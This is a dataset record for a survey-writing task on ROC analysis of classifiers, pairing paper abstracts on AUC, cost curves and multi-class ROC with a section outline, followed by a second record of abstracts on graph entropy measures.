paper_title: Comparing classifiers when the misallocation costs are uncertain paper_content: Receiver Operating Characteristic (ROC) curves are popular ways of summarising the performance of two class classification rules. In fact, however, they are extremely inconvenient. If the relative severity of the two different kinds of misclassification is known, then an awkward projection operation is required to deduce the overall loss. At the other extreme, when the relative severity is unknown, the area under an ROC curve is often used as an index of performance. However, this essentially assumes that nothing whatsoever is known about the relative severity – a situation which is very rare in real problems. We present an alternative plot which is more revealing than an ROC plot and we describe a comparative index which allows one to take advantage of anything that may be known about the relative severity of the two kinds of misclassification. --- paper_title: Efficient AUC Learning Curve Calculation paper_content: A learning curve of a performance measure provides a graphical method with many benefits for judging classifier properties. The area under the ROC curve (AUC) is a useful and increasingly popular performance measure. In this paper, we consider the computational aspects of calculating AUC learning curves. 
A new method is provided for incrementally updating exact AUC curves and for calculating approximate AUC curves for datasets with millions of instances. Both theoretical and empirical justifications are given for the approximation. Variants for incremental exact and approximate AUC curves are provided as well. --- paper_title: Extracting Context-Sensitive Models in Inductive Logic Programming paper_content: Given domain-specific background knowledge and data in the form of examples, an Inductive Logic Programming (ILP) system extracts models in the data-analytic sense. We view the model-selection step facing an ILP system as a decision problem, the solution of which requires knowledge of the context in which the model is to be deployed. In this paper, "context" will be defined by the current specification of the prior class distribution and the client's preferences concerning errors of classification. Within this restricted setting, we consider the use of an ILP system in situations where: (a) contexts can change regularly. This can arise for example, from changes to class distributions or misclassification costs; and (b) the data are from observational studies. That is, they may not have been collected with any particular context in mind. Some repercussions of these are: (a) any one model may not be the optimal choice forall contexts; and (b) not all the background information provided may be relevant for all contexts. Using results from the analysis of Receiver Operating Characteristic curves, we investigate a technique that can equip an ILP system to reject those models that cannot possibly be optimal in any context. We present empirical results from using the technique to analyse two datasets concerned with the toxicity of chemicals (in particular, their mutagenic and carcinogenic properties). Clients can, and typically do, approach such datasets with quite different requirements. For example, a synthetic chemist would require models with a low rate of commission errors which could be used to direct efficiently the synthesis of new compounds. A toxicologist on the other hand, would prefer models with a low rate of omission errors. This would enable a more complete identification of toxic chemicals at a calculated cost of misidentification of non-toxic cases as toxic. The approach adopted here attempts to obtain a solution that contains models that are optimal for each such user according to the cost function that he or she wishes to apply. In doing so, it also provides one solution to the problem of how the relevance of background predicates is to be assessed in ILP. --- paper_title: Learning Decision Trees Using the Area Under the ROC Curve paper_content: ROC analysis is increasingly being recognised as an important tool for evaluation and comparison of classifiers when the operating characteristics (i.e. class distribution and cost parameters) are not known at training time. Usually, each classifier is characterised by its estimated true and false positive rates and is represented by a single point in the ROC diagram. In this paper, we show how a single decision tree can represent a set of classifiers by choosing different labellings of its leaves, or equivalently, an ordering on the leaves. In this setting, rather than estimating the accuracy of a single tree, it makes more sense to use the area under the ROC curve (AUC) as a quality metric. We also propose a novel splitting criterion which chooses the split with the highest local AUC. 
To the best of our knowledge, this is the first probabilistic splitting criterion that is not based on weighted average impurity. We present experiments suggesting that the AUC splitting criterion leads to trees with equal or better AUC value, without sacrificing accuracy if a single labelling is chosen. --- paper_title: Improving Accuracy and Cost of Two-class and Multi-class Probabilistic Classifiers Using ROC Curves paper_content: The probability estimates of a naive Bayes classifier are inaccurate if some of its underlying independence assumptions are violated. The decision criterion for using these estimates for classification therefore has to be learned from the data. This paper proposes the use of ROC curves for this purpose. For two classes, the algorithm is a simple adaptation of the algorithm for tracing a ROC curve by sorting the instances according to their predicted probability of being positive. As there is no obvious way to upgrade this algorithm to the multi-class case, we propose a hill-climbing approach which adjusts the weights for each class in a pre-defined order. Experiments on a wide range of datasets show the proposed method leads to significant improvements over the naive Bayes classifier's accuracy. Finally, we discuss a method to find the global optimum, and show how its computational complexity would make it intractable. --- paper_title: Repairing Concavities in ROC Curves paper_content: In this paper we investigate methods to detect and repair concavities in ROC curves by manipulating model predictions. The basic idea is that, if a point or a set of points lies below the line spanned by two other points in ROC space, we can use this information to repair the concavity. This effectively builds a hybrid model combining the two better models with an inversion of the poorer models; in the case of ranking classifiers, it means that certain intervals of the scores are identified as unreliable and candidates for inversion. We report very encouraging results on 23 UCI data sets, particularly for naive Bayes where the use of two validation folds yielded significant improvements on more than half of them, with only one loss. --- paper_title: The relationship between Precision-Recall and ROC curves paper_content: Receiver Operator Characteristic (ROC) curves are commonly used to present results for binary decision problems in machine learning. However, when dealing with highly skewed datasets, Precision-Recall (PR) curves give a more informative picture of an algorithm's performance. We show that a deep connection exists between ROC space and PR space, such that a curve dominates in ROC space if and only if it dominates in PR space. A corollary is the notion of an achievable PR curve, which has properties much like the convex hull in ROC space; we show an efficient algorithm for computing this curve. Finally, we also note that differences in the two types of curves are significant for algorithm design. For example, in PR space it is incorrect to linearly interpolate between points. Furthermore, algorithms that optimize the area under the ROC curve are not guaranteed to optimize the area under the PR curve. --- paper_title: Explicitly representing expected cost: an alternative to ROC representation paper_content: This paper proposes an alternative to ROC representation, in which the expected cost of a classifier is represented explicitly. This expected cost representation maintains many of the advantages of ROC representation, but is easier to understand.
It allows the experimenter to immediately see the range of costs and class frequencies where a particular classifier is the best and quantitatively how much better it is than other classifiers. This paper demonstrates there is a point/line duality between the two representations. A point in ROC space representing a classifier becomes a line segment spanning the full range of costs and class frequencies. This duality produces equivalent operations in the two spaces, allowing most techniques used in ROC analysis to be readily reproduced in the cost space. --- paper_title: Analysis and Visualization of Classifier Performance: Comparison under Imprecise Class and Cost Distributions paper_content: Applications of inductive learning algorithms to real-world data mining problems have shown repeatedly that using accuracy to compare classifiers is not adequate because the underlying assumptions rarely hold. We present a method for the comparison of classifier performance that is robust to imprecise class distributions and misclassification costs. The ROC convex hull method combines techniques from ROC analysis, decision analysis and computational geometry, and adapts them to the particulars of analyzing learned classifiers. The method is efficient and incremental, minimizes the management of classifier performance data, and allows for clear visual comparisons and sensitivity analyses. --- paper_title: ROC Graphs: Notes and Practical Considerations for Data Mining Researchers paper_content: Receiver Operating Characteristics (ROC) graphs are a useful technique for organizing classifiers and visualizing their performance. ROC graphs are commonly used in medical decision making, and in recent years have been increasingly adopted in the machine learning and data mining research communities. Although ROC graphs are apparently simple, there are some common misconceptions and pitfalls when using them in practice. This article serves both as a tutorial introduction to ROC graphs and as a practical guide for using them in research. --- paper_title: Improving Accuracy and Cost of Two-class and Multi-class Probabilistic Classifiers Using ROC Curves paper_content: The probability estimates of a naive Bayes classifier are inaccurate if some of its underlying independence assumptions are violated. The decision criterion for using these estimates for classification therefore has to be learned from the data. This paper proposes the use of ROC curves for this purpose. For two classes, the algorithm is a simple adaptation of the algorithm for tracing a ROC curve by sorting the instances according to their predicted probability of being positive. As there is no obvious way to upgrade this algorithm to the multi-class case, we propose a hill-climbing approach which adjusts the weights for each class in a pre-defined order. Experiments on a wide range of datasets show the proposed method leads to significant improvements over the naive Bayes classifier's accuracy. Finally, we discuss a method to find the global optimum, and show how its computational complexity would make it intractable. --- paper_title: Training multiclass classifiers by maximizing the volume under the ROC surface paper_content: Receiver operating characteristic (ROC) curves are a plot of a ranking classifier's true-positive rate versus its false-positive rate, as one varies the threshold between positive and negative classifications across the continuum.
The area under the ROC curve offers a measure of the discriminatory power of machine learning algorithms that is independent of class distribution, via its equivalence to Mann-Whitney U-statistics. This measure has recently been extended to cover problems of discriminating three and more classes. In this case, the area under the curve generalizes to the volume under the ROC surface. In this paper, we show how a multi-class classifier can be trained by directly maximizing the volume under the ROC surface. This is accomplished by first approximating the discrete U-statistic that is equivalent to the volume under the surface in a continuous manner, and then maximizing this approximation by gradient ascent. --- paper_title: The quickhull algorithm for convex hulls paper_content: The convex hull of a set of points is the smallest convex set that contains the points. This article presents a practical convex hull algorithm that combines the two-dimensional Quickhull algorithm with the general-dimension Beneath-Beyond Algorithm. It is similar to the randomized, incremental algorithms for convex hull and Delaunay triangulation. We provide empirical evidence that the algorithm runs faster when the input contains nonextreme points and that it uses less memory. Computational geometry algorithms have traditionally assumed that input sets are well behaved. When an algorithm is implemented with floating-point arithmetic, this assumption can lead to serious errors. We briefly describe a solution to this problem when computing the convex hull in two, three, or four dimensions. The output is a set of "thick" facets that contain all possible exact convex hulls of the input. A variation is effective in five or more dimensions. --- paper_title: Volume under the ROC surface for multi-class problems paper_content: Receiver Operating Characteristic (ROC) analysis has been successfully applied to classifier problems with two classes. The Area Under the ROC Curve (AUC) has been elected as a better way to evaluate classifiers than predictive accuracy or error and has also recently been used for evaluating probability estimators. However, the extension of the Area Under the ROC Curve for more than two classes has not been addressed to date, because of the complexity and elusiveness of its precise definition. Some approximations to the real AUC are used without an exact appraisal of their quality. In this paper, we present the real extension to the Area Under the ROC Curve in the form of the Volume Under the ROC Surface (VUS), showing how to compute the polytope that corresponds to the absence of classifiers (given only by the trivial classifiers), to the best classifier and to whatever set of classifiers. We compare the real VUS with "approximations" or "extensions" of the AUC for more than two classes. --- paper_title: Multi-class ROC analysis from a multi-objective optimisation perspective paper_content: The receiver operating characteristic (ROC) has become a standard tool for the analysis and comparison of classifiers when the costs of misclassification are unknown. There has been relatively little work, however, examining ROC for more than two classes. Here we discuss and present an extension to the standard two-class ROC for multi-class problems.
We define the ROC surface for the Q-class problem in terms of a multi-objective optimisation problem in which the goal is to simultaneously minimise the Q(Q-1) misclassification rates, when the misclassification costs and parameters governing the classifier's behaviour are unknown. We present an evolutionary algorithm to locate the Pareto front, the optimal trade-off surface between misclassifications of different types. The use of the Pareto optimal surface to compare classifiers is discussed and we present a straightforward multi-class analogue of the Gini coefficient. The performance of the evolutionary algorithm is illustrated on a synthetic three-class problem, for both k-nearest neighbour and multi-layer perceptron classifiers. --- paper_title: A Simple Generalisation of the Area Under the ROC Curve for Multiple Class Classification Problems paper_content: The area under the ROC curve, or the equivalent Gini index, is a widely used measure of performance of supervised classification rules. It has the attractive property that it side-steps the need to specify the costs of the different kinds of misclassification. However, the simple form is only applicable to the case of two classes. We extend the definition to the case of more than two classes by averaging pairwise comparisons. This measure reduces to the standard form in the two class case. We compare its properties with the standard measure of proportion correct and an alternative definition of proportion correct based on pairwise comparison of classes for a simple artificial case and illustrate its application on eight data sets. On the data sets we examined, the measures produced similar, but not identical results, reflecting the different aspects of performance that they were measuring. Like the area under the ROC curve, the measure we propose is useful in those many situations where it is impossible to give costs for the different kinds of misclassification. --- paper_title: An improved model selection heuristic for AUC paper_content: The area under the ROC curve (AUC) has been widely used to measure ranking performance for binary classification tasks. AUC only employs the classifier's scores to rank the test instances; thus, it ignores other valuable information conveyed by the scores, such as sensitivity to small differences in the score values. However, as such differences are inevitable across samples, ignoring them may lead to overfitting the validation set when selecting models with high AUC. This problem is tackled in this paper. On the basis of ranks as well as scores, we introduce a new metric called scored AUC (sAUC), which is the area under the sROC curve. The latter measures how quickly AUC deteriorates if positive scores are decreased. We study the interpretation and statistical properties of sAUC. Experimental results on UCI data sets convincingly demonstrate the effectiveness of the new metric for classifier evaluation and selection in the case of limited validation data. --- paper_title: Efficient AUC Optimization for Classification paper_content: In this paper we show an efficient method for inducing classifiers that directly optimize the area under the ROC curve. Recently, AUC gained importance in the classification community as a means to compare the performance of classifiers. Because most classification methods do not optimize this measure directly, several classification learning methods are emerging that directly optimize the AUC.
These methods, however, require many costly computations of the AUC, and hence, do not scale well to large datasets. In this paper, we develop a method to increase the efficiency of computing AUC based on a polynomial approximation of the AUC. As a proof of concept, the approximation is plugged into the construction of a scalable linear classifier that directly optimizes AUC using a gradient descent method. Experiments on real-life datasets show a high accuracy and efficiency of the polynomial approximation. --- paper_title: Partial ensemble classifiers selection for better ranking paper_content: Ranking is an important task in data mining and knowledge discovery. We propose a novel approach called PECS algorithm to improve the overall ranking performance of a given ensemble. We formally analyse the sufficient and necessary condition under which PECS algorithm can effectively improve ensemble ranking performance. The experiments with real-world data sets show that this new approach achieves significant improvements in ranking over the original bagging and Adaboost ensembles. --- paper_title: A critical analysis of variants of the AUC paper_content: The area under the ROC curve, or AUC, has been widely used to assess the ranking performance of binary scoring classifiers. Given a sample, the metric considers the ordering of positive and negative instances, i.e., the sign of the corresponding score differences. From a model evaluation and selection point of view, it may appear unreasonable to ignore the absolute value of these differences. For this reason, several variants of the AUC metric that take score differences into account have recently been proposed. In this paper, we present a unified framework for these metrics and provide a formal analysis. We conjecture that, despite their intuitive appeal, actually none of the variants is effective, at least with regard to model evaluation and selection. An extensive empirical analysis corroborates this conjecture. Our findings also shed light on recent research dealing with the construction of AUC-optimizing classifiers. --- paper_title: Modifying ROC curves to incorporate predicted probabilities paper_content: The area under the ROC curve (AUC) is becoming a popular measure for the evaluation of classifiers, even more than other more classical measures, such as error/accuracy, logloss/entropy or precision. The AUC measure is specifically adequate to evaluate in two-class problems how well a model ranks a set of examples according to the probability assigned to the positive class. One shortcoming of AUC is that it ignores the probability values, and it only takes the order into account. On the other hand, logloss or MSE are alternative measures, but they only consider how well the probabilities are calibrated, and not its order. In this paper we introduce a new probabilistic version of AUC, called pAUC. This measure evaluates ranking performance, but also takes the magnitude of the probabilities into account. Secondly, we present a method for visualising a pROC curve such that the area under this curve corresponds to pAUC. --- paper_title: A critical analysis of variants of the AUC paper_content: The area under the ROC curve, or AUC, has been widely used to assess the ranking performance of binary scoring classifiers. Given a sample, the metric considers the ordering of positive and negative instances, i.e., the sign of the corresponding score differences. 
From a model evaluation and selection point of view, it may appear unreasonable to ignore the absolute value of these differences. For this reason, several variants of the AUC metric that take score differences into account have recently been proposed. In this paper, we present a unified framework for these metrics and provide a formal analysis. We conjecture that, despite their intuitive appeal, actually none of the variants is effective, at least with regard to model evaluation and selection. An extensive empirical analysis corroborates this conjecture. Our findings also shed light on recent research dealing with the construction of AUC-optimizing classifiers. --- paper_title: ROC Graphs with Instance-Varying Costs paper_content: Receiver operating characteristics (ROC) graphs are useful for organizing classifiers and visualizing their performance. ROC graphs have been used in cost-sensitive learning because of the ease with which class skew and error cost information can be applied to them to yield cost-sensitive decisions. However, they have been criticized because of their inability to handle instance-varying costs; that is, domains in which error costs vary from one instance to another. This paper presents and investigates a technique for adapting ROC graphs for use with domains in which misclassification costs vary within the instance population. --- paper_title: Efficient AUC Optimization for Classification paper_content: In this paper we show an efficient method for inducing classifiers that directly optimize the area under the ROC curve. Recently, AUC gained importance in the classification community as a means to compare the performance of classifiers. Because most classification methods do not optimize this measure directly, several classification learning methods are emerging that directly optimize the AUC. These methods, however, require many costly computations of the AUC, and hence, do not scale well to large datasets. In this paper, we develop a method to increase the efficiency of computing AUC based on a polynomial approximation of the AUC. As a proof of concept, the approximation is plugged into the construction of a scalable linear classifier that directly optimizes AUC using a gradient descent method. Experiments on real-life datasets show a high accuracy and efficiency of the polynomial approximation. --- paper_title: The DET curve in assessment of detection task performance paper_content: We introduce the DET Curve as a means of representing performance on detection tasks that involve a tradeoff of error types. We discuss why we prefer it to the traditional ROC Curve and offer several examples of its use in speaker recognition and language recognition. We explain why it is likely to produce approximately linear curves. We also note special points that may be included on these curves, how they are used with multiple targets, and possible further applications. --- paper_title: Efficient AUC Learning Curve Calculation paper_content: A learning curve of a performance measure provides a graphical method with many benefits for judging classifier properties. The area under the ROC curve (AUC) is a useful and increasingly popular performance measure. In this paper, we consider the computational aspects of calculating AUC learning curves. A new method is provided for incrementally updating exact AUC curves and for calculating approximate AUC curves for datasets with millions of instances.
Both theoretical and empirical justifications are given for the approximation. Variants for incremental exact and approximate AUC curves are provided as well. --- paper_title: Properties and Benefits of Calibrated Classifiers paper_content: A calibrated classifier provides reliable estimates of the true probability that each test sample is a member of the class of interest. This is crucial in decision making tasks. Procedures for calibration have already been studied in weather forecasting, game theory, and more recently in machine learning, with the latter showing empirically that calibration of classifiers helps not only in decision making, but also improves classification accuracy. In this paper we extend the theoretical foundation of these empirical observations. We prove that (1) a well calibrated classifier provides bounds on the Bayes error, (2) calibrating a classifier is guaranteed not to decrease classification accuracy, and (3) the procedure of calibration provides the threshold or thresholds on the decision rule that minimize the classification error. We also draw the parallels and differences between methods that use receiver operating characteristic (ROC) curves and calibration-based procedures that are aimed at finding a threshold of minimum error. In particular, calibration leads to improved performance when multiple thresholds exist. --- paper_title: Learning Curves for the Analysis of Multiple Instance Classifiers paper_content: In Multiple Instance Learning (MIL) problems, objects are represented by a set of feature vectors, in contrast to the standard pattern recognition problems, where objects are represented by a single feature vector. Numerous classifiers have been proposed to solve this type of MIL classification problem. Unfortunately only two datasets are standard in this field (MUSK-1 and MUSK-2), and all classifiers are evaluated on these datasets using the standard classification error. In practice it is very informative to investigate their learning curves, i.e. the performance on train and test set for a varying number of training objects. This paper offers an evaluation of several classifiers on the standard datasets MUSK-1 and MUSK-2 as a function of the training size. This suggests that for smaller datasets a Parzen density estimator may be preferred over the other 'optimal' classifiers given in the literature. --- paper_title: Active Learning to Maximize Area Under the ROC Curve paper_content: In active learning, a machine learning algorithm is given an unlabeled set of examples U, and is allowed to request labels for a relatively small subset of U to use for training. The goal is then to judiciously choose which examples in U to have labeled in order to optimize some performance criterion, e.g. classification accuracy. We study how active learning affects AUC. We examine two existing algorithms from the literature and present our own active learning algorithms designed to maximize the AUC of the hypothesis. One of our algorithms was consistently the top performer, and Closest Sampling from the literature often came in second behind it. When good posterior probability estimates were available, our heuristics were by far the best. --- paper_title: An Analysis of Rule Evaluation Metrics paper_content: In this paper we analyze the most popular evaluation metrics for separate-and-conquer rule learning algorithms.
Our results show that all commonly used heuristics, including accuracy, weighted relative accuracy, entropy, Gini index and information gain, are equivalent to one of two fundamental prototypes: precision, which tries to optimize the area under the ROC curve for unknown costs, and a cost-weighted difference between covered positive and negative examples, which tries to find the optimal point under known or assumed costs. We also show that a straightforward generalization of the m-estimate trades off these two prototypes. --- paper_title: The relationship between Precision-Recall and ROC curves paper_content: Receiver Operator Characteristic (ROC) curves are commonly used to present results for binary decision problems in machine learning. However, when dealing with highly skewed datasets, Precision-Recall (PR) curves give a more informative picture of an algorithm's performance. We show that a deep connection exists between ROC space and PR space, such that a curve dominates in ROC space if and only if it dominates in PR space. A corollary is the notion of an achievable PR curve, which has properties much like the convex hull in ROC space; we show an efficient algorithm for computing this curve. Finally, we also note that differences in the two types of curves are significant for algorithm design. For example, in PR space it is incorrect to linearly interpolate between points. Furthermore, algorithms that optimize the area under the ROC curve are not guaranteed to optimize the area under the PR curve. --- paper_title: An Analysis of Rule Learning Heuristics paper_content: In this paper we analyze the most popular search heuristics for separate-and-conquer rule learning algorithms. Our results show that all commonly used heuristics, including accuracy, weighted relative accuracy, entropy, Gini index and information gain, are equivalent to one of two fundamental prototypes: precision, which tries to optimize the area under the ROC curve for unknown costs, and a cost-weighted difference between covered positive and negative examples, which tries to find the optimal point under known or assumed costs. We also show that a straightforward generalization of the m-heuristic is a means for trading off between these two prototypes. --- paper_title: Explicitly representing expected cost: an alternative to ROC representation paper_content: This paper proposes an alternative to ROC representation, in which the expected cost of a classifier is represented explicitly. This expected cost representation maintains many of the advantages of ROC representation, but is easier to understand. It allows the experimenter to immediately see the range of costs and class frequencies where a particular classifier is the best and quantitatively how much better it is than other classifiers. This paper demonstrates there is a point/line duality between the two representations. A point in ROC space representing a classifier becomes a line segment spanning the full range of costs and class frequencies. This duality produces equivalent operations in the two spaces, allowing most techniques used in ROC analysis to be readily reproduced in the cost space. --- paper_title: Cost curves: An improved method for visualizing classifier performance paper_content: This paper introduces cost curves, a graphical technique for visualizing the performance (error rate or expected cost) of 2-class classifiers over the full range of possible class distributions and misclassification costs.
Cost curves are shown to be superior to ROC curves for visualizing classifier performance for most purposes. This is because they visually support several crucial types of performance assessment that cannot be done easily with ROC curves, such as showing confidence intervals on a classifier's performance, and visualizing the statistical significance of the difference in performance of two classifiers. A software tool supporting all the cost curve analysis described in this paper is available from the authors. --- paper_title: What ROC curves can’t do (and cost curves can paper_content: This paper shows that ROC curves, as a method of visualizing classifier performance, are inadequate for the needs of Artificial Intelligence researchers in several significant respects, and demonstrates that a different way of visualizing performance – the cost curves introduced by Drummond and Holte at KDD’2000 – overcomes these deficiencies. --- paper_title: An improved measure for comparing diagnostic tests paper_content: We present a loss based method for comparing the predictive performance of diagnostic tests. Unlike standard assessment mechanisms, like the area under the receiver-operating characteristic curve and the misclassification rate, our method takes specific advantage of any information that can be obtained about misclassification costs. We argue that not taking costs into account can lead to incorrect conclusions, and illustrate with two examples. --- paper_title: Comparing classifiers when the misallocation costs are uncertain paper_content: Receiver Operating Characteristic (ROC) curves are popular ways of summarising the performance of two class classification rules. In fact, however, they are extremely inconvenient. If the relative severity of the two different kinds of misclassification is known, then an awkward projection operation is required to deduce the overall loss. At the other extreme, when the relative severity is unknown, the area under an ROC curve is often used as an index of performance. However, this essentially assumes that nothing whatsoever is known about the relative severity – a situation which is very rare in real problems. We present an alternative plot which is more revealing than an ROC plot and we describe a comparative index which allows one to take advantage of anything that may be known about the relative severity of the two kinds of misclassification. ---
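Several of the abstracts above rely on the same underlying procedure: an ROC curve is traced by sorting instances on their predicted scores and sweeping a decision threshold, and the area under that curve equals the normalized Mann-Whitney U statistic. The following is a minimal illustrative sketch of that procedure in Python; it is not taken from any of the cited papers, and the function names (roc_points, auc_rank) and the toy data are hypothetical.

# Illustrative sketch (assumed names, not from the cited papers): trace an ROC
# curve by sorting instances on decreasing score, and compute AUC as the
# normalized Mann-Whitney U statistic. Assumes both classes are present and,
# for auc_rank, that scores contain no ties across classes.

def roc_points(labels, scores):
    """(FPR, TPR) points obtained by sweeping the decision threshold."""
    pos = sum(labels)
    neg = len(labels) - pos
    order = sorted(range(len(labels)), key=lambda i: -scores[i])
    points, tp, fp, prev = [], 0, 0, None
    for i in order:
        if scores[i] != prev:          # emit a point only when the score changes
            points.append((fp / neg, tp / pos))
            prev = scores[i]
        if labels[i] == 1:
            tp += 1
        else:
            fp += 1
    points.append((1.0, 1.0))
    return points

def auc_rank(labels, scores):
    """AUC = probability that a random positive outscores a random negative."""
    ranked = sorted(zip(scores, labels))
    pos = sum(labels)
    neg = len(labels) - pos
    rank_sum = sum(r + 1 for r, (_, y) in enumerate(ranked) if y == 1)
    return (rank_sum - pos * (pos + 1) / 2) / (pos * neg)

y = [1, 1, 0, 1, 0, 0]
s = [0.9, 0.8, 0.7, 0.6, 0.55, 0.1]
print(roc_points(y, s))
print(auc_rank(y, s))   # 8/9: one of the nine positive-negative pairs is ranked wrongly

On the toy data the rank-based value agrees with directly counting, over all positive-negative pairs, the fraction in which the positive instance receives the higher score.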
<format>
Title: ROC Analysis of Classifiers in Machine Learning: A Survey
Section 1: Introduction
Description 1: Write an introduction to ROC analysis, its history, and its relevance in machine learning.
Section 2: Definition of the ROC space
Description 2: Define ROC space, explain the concept of confusion matrix, TPR, FPR, and the basic characteristics of ROC graphs.
Section 3: Engaging classifiers into the ROC construction process
Description 3: Detail the process of generating ROC curves for various classifiers and discuss specifics for common classification models.
Section 4: Applications of ROC analysis
Description 4: Describe the diverse applications of ROC analysis in machine learning, such as model evaluation, comparison, selection, presentation, and construction.
Section 5: Improvements of the basic ROC technique
Description 5: Discuss the enhancements and extensions to the basic ROC method, including ROC convex hulls, confidence intervals, multi-class extensions, and AUC metric variants.
Section 6: Alternatives to the tools of ROC analysis
Description 6: Provide an overview of alternative techniques to ROC graphs for classifier performance comparison, such as DET curves, LC plots, cost curves, and PR curves.
Section 7: Conclusion
Description 7: Summarize the key points discussed in the survey and mention the ongoing and future work in ROC analysis in machine learning.
</format>
A survey of recent results in (generalized) graph entropies
13
--- paper_title: ENTROPY AND THE COMPLEXITY OF GRAPHS: II. THE INFORMATION CONTENT OF DIGRAPHS AND INFINITE GRAPHS paper_content: In an earlier paper, a measure I_g(X) of the structural information content of an (undirected) graph X was defined, and its properties explored. The class of graphs on which I_g is defined is here enlarged to include directed graphs (digraphs). Most of the properties of I_g observed in the undirected case are seen to hold for digraphs. The greater generality of digraphs allows for a construction which shows that there exists a digraph having information content equal to the entropy of an arbitrary partition of a given positive integer. The measure I_g is also extended to a measure defined on infinite (undirected) graphs. The properties of this extension are discussed, and its applicability to the problem of measuring the complexity of algorithms is considered. --- paper_title: A note on the information content of graphs paper_content: The role played by the group of a graph in determining sets of equivalent points is exposed and illustrated by a few simple examples. --- paper_title: A history of graph entropy measures paper_content: This survey seeks to describe methods for measuring the entropy of graphs and to demonstrate the wide applicability of entropy measures. Setting the scene with a review of classical measures for determining the structural information content of graphs, we discuss graph entropy measures which play an important role in a variety of problem areas, including biology, chemistry, and sociology. In addition, we examine relationships between selected entropy measures, illustrating differences quantitatively with concrete examples. --- paper_title: Entropy and the complexity of graphs: III. Graphs with prescribed information content paper_content: The connection between the adjacency matrix and the automorphisms of a digraph is used to develop a method for studying the automorphism group and, thus, the information content (Mowshowitz 1968a, b) of a digraph. An algorithm is given for constructing digraphs with zero information content, and the properties of such digraphs are examined. Moreover, an algorithm for computing the automorphism group of a digraph is presented and is used to find conditions which insure that two digraphs have the same information content. This algorithm is further used to determine the information content of digraphs whose adjacency matrices have prescribed properties. --- paper_title: Entropy and the complexity of graphs: IV. Entropy measures and graphical structure paper_content: The structural information content I_g(X) of a graph X was treated in detail in three previous papers (Mowshowitz 1968a, 1968b, 1968c). Those investigations of I_g point up the desirability of defining and examining other entropy-like measures on graphs. To this end the chromatic information content I_c(X) of a graph X is defined as the minimum entropy over all finite probability schemes constructed from chromatic decompositions having rank equal to the chromatic number of X. Graph-theoretic results concerning chromatic number are used to establish basic properties of I_c on arbitrary graphs. Moreover, the behavior of I_c on certain special classes of graphs is examined. The peculiar structural characteristics of a graph on which the respective behaviors of the entropy-like measures I_c and I_g depend are also discussed.
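The measure I_g referred to in the abstracts above is the Shannon entropy of the partition of the vertex set into orbits of the graph's automorphism group. The following brute-force Python sketch (my own illustration, not code from the cited papers, and practical only for very small graphs) makes that definition concrete.

# Illustrative sketch (not from the cited papers): I_g(X) as the entropy of the
# orbit partition induced by the automorphism group, found here by brute force
# over all vertex permutations, so only tiny graphs are feasible.
from itertools import permutations
from math import log2

def orbit_entropy(n, edges):
    adj = {frozenset(e) for e in edges}
    autos = [p for p in permutations(range(n))
             if all((frozenset((p[u], p[v])) in adj) == (frozenset((u, v)) in adj)
                    for u in range(n) for v in range(u + 1, n))]
    orbits = {frozenset(p[v] for p in autos) for v in range(n)}   # orbit of each vertex
    return -sum((len(o) / n) * log2(len(o) / n) for o in orbits)

# Path on 4 vertices: orbits {end vertices} and {middle vertices}, so I_g = 1 bit.
print(orbit_entropy(4, [(0, 1), (1, 2), (2, 3)]))
# Star on 4 vertices: orbits {centre} and {three leaves}, I_g is about 0.811 bits.
print(orbit_entropy(4, [(0, 1), (0, 2), (0, 3)]))

A vertex-transitive graph has a single orbit and hence I_g = 0, which matches the reading of I_g as an index of structural diversity.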
--- paper_title: Life, information theory, and topology paper_content: The information content of an organism determines to a large extent its ability to perform the basic vital functions: selection of food, breaking up of the food molecules into appropriate parts, selection of those parts, and their assimilation. The information content needed is very large and requires a sufficiently large complexity of the organism. The information content of an organism is largely determined by the information content of the constituent organic molecules. The information content of the latter is in its turn determined by the number of physically distinguishable atoms or radicals of which the molecule is composed. The different arrangements of atoms in a molecule are represented by the structural formula, which is basically a graph. It is shown that the topology of this graph also determines to a large extent the information content. Different points of a graph may be physically indistinguishable; in general, however, they are different in regard to their topological properties. A study of the relations between the topological properties of graphs and their information content is suggested, and several theorems are demonstrated. A relation between topology and living processes is thus found also on the molecular level. --- paper_title: Entropy and the complexity of graphs. I. An index of the relative complexity of a graph. paper_content: The structural information content (Rashevsky, 1955; Trucco 1956a, b) I_g(X) of a graph X is defined as the entropy of the finite probability scheme constructed from the orbits of its automorphism group G(X). The behavior of I_g on various graph operations (complement, sum, join, Cartesian product and composition) is examined. The principal result of the paper is the characterization of a class of graph product operations on which I_g is semi-additive. That is to say, conditions are found for binary operations ∘ and ∇ defined on graphs and groups, respectively, which are sufficient to insure that I_g(X ∘ Y) = I_g(X) + I_g(Y) − H_XY, where H_XY is a certain conditional entropy defined relative to the orbits of G(X ∘ Y) and G(X) ∇ G(Y). --- paper_title: Identities and Inequalities for Tree Entropy paper_content: The notion of tree entropy was introduced by the author as a normalized limit of the number of spanning trees in finite graphs, but is defined on random infinite rooted graphs. We give some new expressions for tree entropy; one uses Fuglede-Kadison determinants, while another uses effective resistance. We use the latter to prove that tree entropy respects stochastic domination. We also prove that tree entropy is non-negative in the unweighted case, a special case of which establishes Lueck's Determinant Conjecture for Cayley-graph Laplacians. We use techniques from the theory of operators affiliated to von Neumann algebras. --- paper_title: Generalized graph entropies paper_content: This article deals with generalized entropies for graphs. These entropies result from applying information measures to a graph using various schemes for defining probability distributions over the elements (e.g., vertices) of the graph. We introduce a new class of generalized measures, develop their properties, compute the measures for selected graphs, and briefly discuss potential applications to classification and clustering problems. © 2011 Wiley Periodicals, Inc. Complexity, 17, 45–50, 2011.
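For the tree entropy mentioned in the abstract above, the finite-graph quantity being normalized is the number of spanning trees, which the matrix-tree theorem expresses as a cofactor of the graph Laplacian. The snippet below is a small illustrative sketch of that finite-graph computation (assumed function name, not code from the cited papers).

# Illustrative sketch (assumed name, not from the cited papers): log of the
# number of spanning trees per vertex for a finite connected graph, computed
# via the matrix-tree theorem (tau(G) equals any cofactor of the Laplacian).
import numpy as np

def log_tree_count_per_vertex(n, edges):
    L = np.zeros((n, n))
    for u, v in edges:
        L[u, u] += 1
        L[v, v] += 1
        L[u, v] -= 1
        L[v, u] -= 1
    sign, logdet = np.linalg.slogdet(L[1:, 1:])   # delete first row and column
    return logdet / n

# Complete graph K4 has 4**(4-2) = 16 spanning trees, so the value is log(16)/4.
k4_edges = [(i, j) for i in range(4) for j in range(i + 1, 4)]
print(log_tree_count_per_vertex(4, k4_edges), np.log(16) / 4)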
